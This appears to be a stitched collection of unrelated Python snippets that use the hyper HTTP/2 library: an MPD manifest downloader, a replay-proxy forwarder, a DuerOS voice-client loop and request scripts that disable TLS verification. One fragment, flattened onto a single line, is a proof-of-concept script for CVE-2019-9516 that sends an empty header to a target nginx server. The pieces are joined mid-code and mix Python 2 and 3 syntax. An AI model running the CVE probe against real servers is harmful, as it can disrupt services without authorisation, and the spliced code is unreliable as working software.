    proxy = None  # NOTE(review): unused local, kept as-is
    self.request = request
    self.http2 = http2
    self.realhost = proxy_host
    self.realport = proxy_port
    self.proxy_auth = proxy_auth
    self.__wbuf = BytesIO()
    # Proxy-Authorization is only attached for https through a proxy.
    if self.scheme == 'https' and self.using_proxy() and self.proxy_auth:
        self.proxy_headers = {'Proxy-Authorization': self.proxy_auth}
    else:
        self.proxy_headers = None
    self.url = '%s://%s:%s%s' % (self.scheme, self.host, self.port, self.path)
    if customThrift:
        # Eagerly build the transport for the selected backend.
        if self.request == 'hyper':
            if self.http2:
                self.__http = hyper.HTTP20Connection(
                    self.host, self.port,
                    proxy_host=self.realhost,
                    proxy_port=self.realport,
                    proxy_headers=self.proxy_headers)
            else:
                self.__http = hyper.HTTPConnection(
                    self.host, self.port,
                    proxy_host=self.realhost,
                    proxy_port=self.realport,
                    proxy_headers=self.proxy_headers)
        elif self.request == 'httpx':
            self.__http = httpx.AsyncClient(base_url='%s://%s' % (self.scheme, self.host), http2=self.http2)
        else:
            if self.http2:
                self.__http = httplib2.Http()
            elif self.scheme == 'http':
                self.__http = http_client.HTTPConnection(self.host, self.port)
            elif self.scheme == 'https':
                self.__http = http_client.HTTPSConnection(self.host, self.port)
                if self.using_proxy():
                    self.__http.set_tunnel(self.realhost, self.realport, self.proxy_headers)
    else:
        self.__http = None
    # httpx is async; keep an event loop handy only for that backend.
    self.__async_loop = asyncio.get_event_loop() if self.request == 'httpx' else None
    self.__http_response = None
    self.__response_data = None
    self.__last_read = 0
    self.__timeout = None
    self.__custom_headers = None
    self.__time = time.time()
    self.__custom_thrift = customThrift
    self.__loop = 0
def get_mpd(url):
    """ Module to download the MPD from the URL and save it to file"""
    # Returns the local filename on success, or None on any download error.
    # Side effect: rebinds the module-global `connection` for segment reuse.
    global connection
    try:
        # TLS context with a client certificate; paths are machine-specific.
        ssl_context = hyper.tls.init_context()
        ssl_context.load_cert_chain(certfile='/dev/SQUAD/cert.crt', keyfile='/dev/SQUAD/cert.key')
        ssl_context.load_verify_locations(cafile='/dev/SQUAD/cert.pem')
        parse_url = urllib.parse.urlparse(url)
        connection = hyper.HTTP20Connection(parse_url.netloc, ssl_context=ssl_context, force_proto='h2', secure=True, port=443)
        connection.network_buffer_size = int(DOWNLOAD_CHUNK)
        #parse_url = urlparse.urlparse(url)
        '''
        combine_url = str.join((parse_url.scheme, "://",parse_url.netloc))
        config_dash.LOG.info("DASH URL %s" %combine_url)
        connection = urllib3.connection_from_url(combine_url)
        conn_mpd = connection.request('GET', combine_url)
        config_dash.LOG.info("MPD URL %s" %parse_url.path)
        '''
        #connection = HTTPConnectionPool(parse_url.netloc)
        http2_conn = connection.request('GET', parse_url.path)
        mpd_conn = connection.get_response(http2_conn)
    except hyper.http20.exceptions.HTTP20Error as error:
        config_dash.LOG.error("Unable to download MPD file HTTP2 Error: %s" % error.code)
        return None
    except hyper.http20.exceptions.ConnectionError:
        error_message = "URLError. Unable to reach Server.Check if Server active"
        config_dash.LOG.error(error_message)
        print(error_message)
        return None
    except (IOError, httplib.HTTPException) as e1:
        # NOTE(review): `httplib` is the Python 2 module name — confirm it is
        # imported/aliased for Python 3 (http.client).
        message = "Unable to , file_identifierdownload MPD file HTTP Error."
        config_dash.LOG.error(message)
        return None
    #mpd_data = mpd_conn.read()
    #connection.close()
    mpd_file = url.split('/')[-1]
    t = []
    i = 0
    chunk_dl_rates = []
    mpd_file_handle = open(mpd_file, 'wb')
    chunk_start_time = timeit.default_timer()
    segment_size = 0
    chunk_number = 0
    total_data_dl_time = 0
    # for mpd_data in mpd_conn.read_proper_chunks(int(DOWNLOAD_CHUNK)):
    # Read the body in DOWNLOAD_CHUNK-sized pieces until a short read.
    mpd_data = mpd_conn.read(int(DOWNLOAD_CHUNK))
    while mpd_data:
        # (per-chunk rate bookkeeping below kept commented out, as found)
        # segment_size += len(mpd_data)
        # timenow = timeit.default_timer()
        # chunk_dl_time = timenow - chunk_start_time
        # chunk_start_time=timenow
        # chunk_number += 1
        # total_data_dl_time += chunk_dl_time
        # current_chunk_dl_rate = segment_size * 8 / total_data_dl_time
        # chunk_dl_rates.append(current_chunk_dl_rate)
        # t.append(i)"""
        mpd_file_handle.write(mpd_data)
        if (len(mpd_data) < DOWNLOAD_CHUNK):
            # print("saw b:{},chunks:{}".format(len(t),chunk_dl_rates))
            # exit()
            break
        mpd_data = mpd_conn.read(int(DOWNLOAD_CHUNK))
        #print("MPD seg:#",mpd_data)
    mpd_file_handle.close()
    mpd_conn.close()
    #mpd_conn.release_conn()
    #config_dash.LOG.info(mpd_conn.data)
    config_dash.LOG.info("Downloaded the MPD file {}".format(mpd_file))
    return mpd_file
# # - Patch: https://github.com/nginx/nginx/commit/6dfbc8b1c2116f362bb871efebbf9df576738e89 # - https://www.nginx.com/blog/nginx-updates-mitigate-august-2019-http-2-vulnerabilities # # usage: # ./CVE-2019-9516.py <host> # # [/csh:]> date "+%D" # 07/07/21 # # SSLCONTEXT for not verifying SSLCertificate and Hostname context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) context.verify_mode = ssl.CERT_NONE context.check_hostname = False context.set_alpn_protocols(['h2']) hyper.tls._context = context headers = {'': ''} conn = hyper.HTTP20Connection(sys.argv[1], port=443, ssl_context=context) conn.request('GET', '/', headers=headers) resp = conn.get_response() #print(resp) print(resp.status) print(resp.headers) print(resp.read().decode('utf8'))
def _send_http2_request_to_server(self, request_headers, req_body, client_stream_id):
    """Forward a client HTTP/2 request to the local replay server.

    Returns (response_headers, response_body) on success. Falls back to
    HTTP/1 when ALPN refuses h2; on transport failure answers the client
    stream with a 502 and returns None. Connections are cached per
    (scheme, server, SNI) origin in self.tls.http_conns.
    """
    if not self.is_h2_to_server:
        raise RuntimeError(
            "Unexpected received non is_h2_to_server in _send_http2_request_to_server"
        )
    # Re-pack the raw header tuples into an HttpHeaders message, then strip
    # hop-by-hop headers.
    request_headers_message = HttpHeaders()
    for name, value in request_headers:
        request_headers_message.add_header(name, value)
    request_headers = request_headers_message
    request_headers = ProxyRequestHandler.filter_headers(request_headers)
    scheme = request_headers[':scheme']
    replay_server = "127.0.0.1:{}".format(self.server_port)
    method = request_headers[':method']
    path = request_headers[':path']
    try:
        origin = (scheme, replay_server, self.client_sni)
        if origin not in self.tls.http_conns:
            gcontext = hyper.tls.init_context(cert_path=self.ca_file, cert=self.cert_file)
            if self.client_sni:
                # Patch wrap_socket so the outgoing TLS handshake carries the
                # client's SNI instead of the literal 127.0.0.1.
                setattr(gcontext, "old_wrap_socket", gcontext.wrap_socket)

                def new_wrap_socket(sock, *args, **kwargs):
                    kwargs['server_hostname'] = self.client_sni
                    gcontext.check_hostname = False
                    return gcontext.old_wrap_socket(sock, *args, **kwargs)

                setattr(gcontext, "wrap_socket", new_wrap_socket)
            http2_connection = hyper.HTTP20Connection(
                '127.0.0.1', port=self.server_port, secure=True, ssl_context=gcontext)
            try:
                http2_connection.connect()
            except AssertionError:
                # This happens when ALPN negotiation refuses HTTP2; retry HTTP/1.
                print("HTTP/2 negotiation failed. Trying with HTTP/1")
                return self._send_http1_request_to_server(
                    request_headers, req_body, client_stream_id)
            self.tls.http_conns[origin] = http2_connection
        connection_to_server = self.tls.http_conns[origin]
        server_stream_id = connection_to_server.request(method, path, req_body, request_headers)
        res = connection_to_server.get_response(server_stream_id)
        response_body = res.read(decode_content=False)
    except Exception as e:
        # Drop the (possibly broken) cached connection and answer 502.
        if origin in self.tls.http_conns:
            del self.tls.http_conns[origin]
        # FIX: send_headers expects an iterable of (name, value) pairs;
        # ((':status', '502')) is just one tuple — the trailing comma was
        # missing, so each header "pair" was a single string.
        self.listening_conn.send_headers(client_stream_id,
                                         ((':status', '502'),),
                                         end_stream=True)
        print(
            "Connection to '{}' initiated with request to '{}://{}{}' failed: {}"
            .format(replay_server, scheme,
                    request_headers.get(':authority', ''), path, e))
        traceback.print_exc(file=sys.stdout)
        return
    setattr(res, 'headers', ProxyRequestHandler.filter_headers(res.headers))
    response_headers = ((':status', str(res.status)), )
    previous_k = b''
    previous_v = b''
    for k, v in res.headers:
        if k == b'date' and k == previous_k:
            # HTTPHeaderMap annoyingly splits the date header on the comma:
            #   "Sat, 16 Mar 2019 01:13:21 GMT"
            # yields (b'date', b'Sat') and (b'date', b'16 Mar 2019 ...');
            # stitch consecutive date values back together.
            v = previous_v + b', ' + v
            response_headers = response_headers[0:-1]
        response_headers += ((k, v), )
        previous_k, previous_v = k, v
    self.print_info(request_headers, req_body, response_headers, response_body,
                    res.status, res.reason)
    return response_headers, response_body
def __run(self):
    '''
    Run-loop implementation.

    Opens one HTTP/2 connection to the configured host, starts the long-lived
    GET "directives" downchannel stream, then loops until self.done: queued
    events are sent as multipart POSTs (JSON metadata part plus an optional
    streamed "audio" attachment part), and any downchannel frames that arrive
    in between are drained and dispatched via self.__read_response.
    :return: None
    '''
    # Single HTTP/2 connection carries the downchannel and every event stream.
    conn = hyper.HTTP20Connection('{}:443'.format(self.__config['host_url']), force_proto='h2')
    headers = {'authorization': 'Bearer {}'.format(self.token)}
    if 'dueros-device-id' in self.__config:
        headers['dueros-device-id'] = self.__config['dueros-device-id']
    # Open the long-lived directives downchannel.
    downchannel_id = conn.request('GET', '/{}/directives'.format(self.__config['api']), headers=headers)
    downchannel_response = conn.get_response(downchannel_id)
    if downchannel_response.status != 200:
        raise ValueError("/directive requests returned {}".format(downchannel_response.status))
    # The downchannel body is multipart; extract its boundary from content-type.
    ctype, pdict = cgi.parse_header(downchannel_response.headers['content-type'][0].decode('utf-8'))
    downchannel_boundary = '--{}'.format(pdict['boundary']).encode('utf-8')
    downchannel = conn.streams[downchannel_id]
    downchannel_buffer = io.BytesIO()
    # Boundary used for the multipart bodies WE send on event streams.
    eventchannel_boundary = 'baidu-voice-engine'
    # ping every 5 minutes (60 seconds early for latency) to maintain the connection
    self.__ping_time = datetime.datetime.utcnow() + datetime.timedelta(seconds=240)
    self.event_queue.queue.clear()
    self.system.synchronize_state()
    while not self.done:
        # logger.info("Waiting for event to send to AVS")
        # logger.info("Connection socket can_read %s", conn._sock.can_read)
        try:
            # Block briefly for the next queued (event, listener, attachment).
            event, listener, attachment = self.event_queue.get(timeout=0.25)
        except queue.Empty:
            event = None

        # we want to avoid blocking if the data wasn't for stream downchannel
        while conn._sock.can_read:
            conn._single_read()
        # Drain any directive frames that arrived on the downchannel.
        while downchannel.data:
            framebytes = downchannel._read_one_frame()
            self.__read_response(framebytes, downchannel_boundary, downchannel_buffer)

        if event is None:
            # Nothing to send; keep the connection alive instead.
            self.__ping(conn)
            continue

        headers = {
            ':method': 'POST',
            ':scheme': 'https',
            ':path': '/{}/events'.format(self.__config['api']),
            'authorization': 'Bearer {}'.format(self.token),
            'content-type': 'multipart/form-data; boundary={}'.format(eventchannel_boundary)
        }
        if 'dueros-device-id' in self.__config:
            headers['dueros-device-id'] = self.__config['dueros-device-id']

        # Open the event stream manually so the body can be streamed in parts.
        stream_id = conn.putrequest(headers[':method'], headers[':path'])
        default_headers = (':method', ':scheme', ':authority', ':path')
        for name, value in headers.items():
            # Pseudo-headers replace the ones putrequest already set.
            is_default = name in default_headers
            conn.putheader(name, value, stream_id, replace=is_default)
        conn.endheaders(final=False, stream_id=stream_id)

        metadata = {
            'clientContext': self.context,
            'event': event
        }
        logger.debug('metadata: {}'.format(json.dumps(metadata, indent=4)))

        # First multipart part: the JSON metadata.
        json_part = '--{}\r\n'.format(eventchannel_boundary)
        json_part += 'Content-Disposition: form-data; name="metadata"\r\n'
        json_part += 'Content-Type: application/json; charset=UTF-8\r\n\r\n'
        json_part += json.dumps(metadata)
        conn.send(json_part.encode('utf-8'), final=False, stream_id=stream_id)
        print '[DuerOS_SEND_1]:',json.dumps(metadata, sort_keys=True, indent=4,separators=(',',':'))

        if attachment:
            # Second multipart part: the audio attachment, streamed chunk by
            # chunk (attachment is an iterable of byte chunks).
            attachment_header = '\r\n--{}\r\n'.format(eventchannel_boundary)
            attachment_header += 'Content-Disposition: form-data; name="audio"\r\n'
            attachment_header += 'Content-Type: application/octet-stream\r\n\r\n'
            conn.send(attachment_header.encode('utf-8'), final=False, stream_id=stream_id)
            # AVS_AUDIO_CHUNK_PREFERENCE = 320
            for chunk in attachment:
                conn.send(chunk, final=False, stream_id=stream_id)
                # print '===============send(attachment.chunk)'
                #print '[DuerOS_SEND_2]:',chunk
                # check if StopCapture directive is received
                while conn._sock.can_read:
                    conn._single_read()
            while downchannel.data:
                framebytes = downchannel._read_one_frame()
                self.__read_response(framebytes, downchannel_boundary, downchannel_buffer)

        self.last_activity = datetime.datetime.utcnow()
        # Closing boundary ends the multipart body and the stream.
        end_part = '\r\n--{}--'.format(eventchannel_boundary)
        conn.send(end_part.encode('utf-8'), final=True, stream_id=stream_id)
        print '[DuerOS_SEND_2]:',end_part
        logger.info("wait for response")
        resp = conn.get_response(stream_id)
        logger.info("status code: %s", resp.status)
        if resp.status == 200:
            self.__read_response(resp)
        elif resp.status == 204:
            # 204: event accepted, no directives to process.
            pass
        else:
            logger.warning(resp.headers)
            logger.warning(resp.read())
        if listener and callable(listener):
            listener()
def get_mpd(url):
    """Download the MPD manifest at `url` over HTTP/2 and save it to a local file.

    Side effect: stores the HTTP/2 connection in the module-level `connection`
    global (callers reuse it for later downloads). The MPD is streamed in
    DOWNLOAD_CHUNK-sized reads while per-chunk cumulative download rates are
    recorded, and written to a file named after the last URL path component.

    Args:
        url: full URL of the MPD file.

    Returns:
        The local MPD filename on success, None on any download error.
    """
    global connection
    try:
        # NOTE(review): certificate paths are hard-coded to this host's
        # filesystem layout — consider making them configurable.
        ssl_context = hyper.tls.init_context()
        ssl_context.load_cert_chain(certfile='/mnt/QUIClientServer0/cert.crt',
                                    keyfile='/mnt/QUIClientServer0/cert.key')
        ssl_context.load_verify_locations(
            cafile='/mnt/QUIClientServer0/cert.pem')
        parse_url = urllib.parse.urlparse(url)
        connection = hyper.HTTP20Connection(parse_url.netloc, ssl_context=ssl_context,
                                            force_proto='h2', secure=True)
        stream_id = connection.request('GET', parse_url.path)
        mpd_conn = connection.get_response(stream_id)
    except hyper.http20.exceptions.HTTP20Error as error:
        config_dash.LOG.error("Unable to download MPD file HTTP2 Error: %s" % error.code)
        return None
    except hyper.http20.exceptions.ConnectionError:
        error_message = "URLError. Unable to reach Server.Check if Server active"
        config_dash.LOG.error(error_message)
        print(error_message)
        return None
    except (IOError, httplib.HTTPException):
        # Fixed garbled message ("Unable to , file_identifierdownload ...").
        config_dash.LOG.error("Unable to download MPD file. HTTP Error.")
        return None

    mpd_file = url.split('/')[-1]
    chunk_dl_rates = []      # cumulative average rate (bits/s) after each chunk
    chunk_number = 0         # chunks received so far (replaces the old t/i lists)
    segment_size = 0         # bytes received so far
    total_data_dl_time = 0

    # Stream the response body in DOWNLOAD_CHUNK-sized pieces, timing each
    # read; `with` guarantees the file is closed even if a read raises.
    with open(mpd_file, 'wb') as mpd_file_handle:
        chunk_start_time = timeit.default_timer()
        while True:
            mpd_data = mpd_conn.read(int(DOWNLOAD_CHUNK))
            if not mpd_data:
                break
            segment_size += len(mpd_data)
            timenow = timeit.default_timer()
            total_data_dl_time += timenow - chunk_start_time
            chunk_start_time = timenow
            chunk_number += 1
            # Running average over the whole download so far, in bits/second.
            chunk_dl_rates.append(segment_size * 8 / total_data_dl_time)
            mpd_file_handle.write(mpd_data)
            if len(mpd_data) < DOWNLOAD_CHUNK:
                # A short read means the body is exhausted.
                print("saw b:", chunk_number, "chunks:", chunk_dl_rates)
                break

    mpd_conn.close()
    config_dash.LOG.info("Downloaded the MPD file {}".format(mpd_file))
    return mpd_file
import ssl
import hyper

# Build a deliberately permissive TLS context: certificate and hostname
# verification disabled, ALPN restricted to HTTP/2. A custom context is
# needed both to skip verification and for SNI support.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_NONE
context.check_hostname = False
context.set_alpn_protocols(['h2'])
# Install it as hyper's module-wide default context (private attribute).
hyper.tls._context = context

headers = {
    'Host': '172.18.0.4',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'x': 'ciaociao'
}
headers2 = [('Upgrade-Insecure-Requests', '1')]

# Issue 100 sequential GETs over a single HTTP/2 connection and print each body.
conn = hyper.HTTP20Connection('172.18.0.4', port=443, ssl_context=context)
for _ in range(100):
    conn.request('GET', '/', headers=headers)
    response = conn.get_response()
    print(response.read())